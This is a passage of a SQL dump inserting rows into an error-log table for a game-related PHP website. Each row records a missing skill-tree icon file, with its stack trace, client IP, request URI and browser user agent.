/home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.016, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_devotion.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (733, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_shield_06.png\' found.', '8d822328a775b89ea51021a9374718c436c87e00', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_shield_06.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_shield_06.p...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.016, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills&id=inv_shield_06.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (734, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_mirrorimage.png\' found.', 'b6e62228cc7fcb692f98a66d0d5c75f60050ea89', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_mi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_mi...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills&id=spell_nature_mirrorimage.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (735, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_summonimp.png\' found.', 'f489996367ac8c5a23b0a7d7191340dec5228eda', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_su...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_su...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_summonimp.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (736, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_thunderclap.png\' found.', '7de3dca2b2ad7696046edae0744436bd749cb7cd', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_thunder...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_thunder...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_thunderclap.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (737, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_racial_bloodrage.png\' found.', '8ce2f7375d9060b9dfd96308c8a354f0e5fd6c67', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_racial_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_racial_...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.024, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_racial_bloodrage.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (738, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_ashestoashes.png\' found.', 'f2e00d9be7a99d7c0907a59326e1dfa41b20b1a9', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_ashe...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_ashe...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.016, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_ashestoashes.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (739, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_disarm.png\' found.', '9d004896a81fe1cfdcb964f44629793965352133', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.024, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_disarm.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (740, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_enchantarmor.png\' found.', '226b7607de2e1a22b68d9052300f5ca3ce228f96', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_en...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_en...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.02, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_enchantarmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (741, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_innerrage.png\' found.', '65347cb1e8ab425146273e9901f64097e1673152', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_innerrage.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (742, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_shieldbash.png\' found.', 'c584f547463f1e939c8e33f3a6c6dfcf9e93aa0a', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_shieldbash.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (743, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_axe_06.png\' found.', '5ae5979b6848dacc40b421a9328b639462682cd3', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_axe_06.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_axe_06.png\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.012, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_axe_06.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (744, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_axe_09.png\' found.', '7ad51de87bfcd3fe95587aa6dcc7070c9a19dbcb', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_axe_09.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_axe_09.png\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.012, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=inv_axe_09.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (745, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_thunderbolt.png\' found.', '453750c60c164f64019cb9764da3b2c903bbd5a2', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_thunder...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_thunder...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.012, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_thunderbolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (746, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_deathscream.png\' found.', '2f16a8affcaab82bc7cc671ebb456f8cfbaacee6', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_de...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_de...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_deathscream.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (747, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_deathpact.png\' found.', '0287610409f5ab545dca86b8a5b87349e56c4288', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_de...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_de...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_deathpact.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (748, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_sprint.png\' found.', '24b5b2b12805a7804397cf0cb36de138ef805e5e', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_s...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_s...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.004, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_rogue_sprint.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (749, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_slicedice.png\' found.', '97cd898fd76c9fa9c44c42e1295d3c92081d2035', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_s...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_s...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_rogue_slicedice.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (750, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_warcry.png\' found.', '8e0606d1ee3a2974a4496c431e616ae81e630749', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.008, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_warcry.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (751, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_stoneclawtotem.png\' found.', 'c5c5e0042fc81dacf998bb032bf8aaf78e76f310', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_st...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_st...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.032, '2014-12-14 18:43:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_stoneclawtotem.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (752, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_dualwield.png\' found.', '8f790d40b6346be54f1ac0be07ff194e87856708', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_dualwie...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_dualwie...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', 